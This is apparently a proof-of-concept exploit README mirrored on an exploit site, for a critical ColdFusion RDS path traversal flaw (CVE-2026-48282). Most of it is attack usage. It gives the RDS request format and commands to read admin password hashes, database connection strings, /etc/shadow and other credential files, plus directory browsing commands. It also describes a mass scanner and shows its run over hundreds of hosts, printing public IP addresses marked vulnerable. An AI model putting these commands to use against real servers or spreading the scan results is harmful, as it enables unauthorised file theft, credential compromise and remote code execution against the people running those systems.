Share
## https://sploitus.com/exploit?id=7F545708-BC92-502E-8843-CCFCD621EA57
# CVE-2026-48282-POC
**CVE-2026-48282** is a **path traversal** vulnerability in **Adobe ColdFusion's Remote Development Service (RDS)** with a CVSS score of **10.0 (Critical)**. It allows unauthenticated attackers to read & write arbitrary files via the `/CFIDE/main/ide.cfm` endpoint, leading to **Remote Code Execution (RCE)**.
## ๐ Overview
| | |
|---|---|
| **CVE** | CVE-2026-48282 |
| **CVSS** | 10.0 (Critical) |
| **Type** | CWE-22: Path Traversal โ Arbitrary File Read/Write โ RCE |
| **Vendor** | Adobe |
| **Product** | ColdFusion 2025 โค Update 9, ColdFusion 2023 โค Update 20 |
| **Endpoint** | `/CFIDE/main/ide.cfm` |
| **Prerequisites** | RDS enabled + authentication disabled |
| **Discovered by** | WatchTowr Labs / QiAnXin CERT |
| **Patch** | [APSB26-68](https://helpx.adobe.com/security/products/coldfusion/apsb26-68.html) |
---
## ๐ฌ How It Works
Adobe ColdFusion uses a **proprietary RDS protocol** to communicate with development tools like Dreamweaver. The protocol encodes data in `STR:` format within the HTTP POST body:
```
POST /CFIDE/main/ide.cfm HTTP/1.1
Content-Type: application/x-ColdFusionIDE
User-Agent: Dreamweaver-RDS-SCM1.00
N:STR:LEN:VALUE[STR:LEN:VALUE...]
```
## Installation
```bash
# Clone the repository
git clone https://github.com//CVE-2026-48282.git
cd CVE-2026-48282
# Install dependencies (only requires `requests`)
pip install -r requirements.txt
```
# Usage
### Step 1 โ Check if a target is vulnerable
```bash
python cve-2026-48282.py -t http://target.com --check
```
```
[+] RDS endpoint is reachable.
[+] Target appears vulnerable, OS: windows
[โ] TARGET IS VULNERABLE to CVE-2026-48282
```
### Step 2 โ Read sensitive files
Once confirmed vulnerable, extract credentials and configuration:
```bash
# ColdFusion admin password hash
python cve-2026-48282.py -t http://target.com \
--read "C:\\CFusionMX7\\lib\\password.properties"
# Database connection strings (neo-query.xml)
python cve-2026-48282.py -t http://target.com \
--read "C:\\CFusionMX7\\lib\\neo-query.xml"
# ColdFusion security configuration
python cve-2026-48282.py -t http://target.com \
--read "C:\\CFusionMX7\\lib\\neo-security.xml"
# IIS metabase (Windows servers)
python cve-2026-48282.py -t http://target.com \
--read "C:\\Windows\\System32\\inetsrv\\MetaBase.xml"
# Application source code
python cve-2026-48282.py -t http://target.com \
--read "C:\\inetpub\\wwwroot\\index.cfm"
# Linux targets
python cve-2026-48282.py -t https://target.com --read /etc/passwd
python cve-2026-48282.py -t https://target.com --read /etc/shadow
# Save output to a file
python cve-2026-48282.py -t http://target.com --read "C:\\boot.ini" -o boot.ini
```
### Step 3 โ Browse directories
```bash
# List root directory
python cve-2026-48282.py -t http://target.com --browse "C:\\"
# List web root
python cve-2026-48282.py -t http://target.com --browse "C:\\inetpub\\wwwroot"
# List ColdFusion config directory
python cve-2026-48282.py -t http://target.com --browse "C:\\ColdFusion2023\\cfusion\\lib"
# Linux
python cve-2026-48282.py -t https://target.com --browse "/opt/coldfusion/cfusion/lib"
```
## Mass Scanner โ Scan Hundreds of Targets
The included `mass_scanner.py` reads a CSV file of targets and tests all of them in parallel.
```bash
# 1. Prepare a CSV file (columns: host,ip,port,domain)
cp /path/to/Asset-Data.csv targets.csv
# 2. Run the scanner
python mass_scanner.py
```
```
[*] Unique targets to scan: 366
[*] Scanning with 30 threads...
[ 1/366] 110.159.228.197:80 ๐จ VULNERABLE
[ 2/366] 202.58.82.85:80 โ ๏ธ RDS open
...
[366/366] 175.142.20.5:8888 ๐ด connection_refused
Scan complete in 38.3s
๐จ Vulnerable: 1
โ ๏ธ RDS accessible: 9
๐ต ColdFusion found: 17
๐ Total scanned: 366
```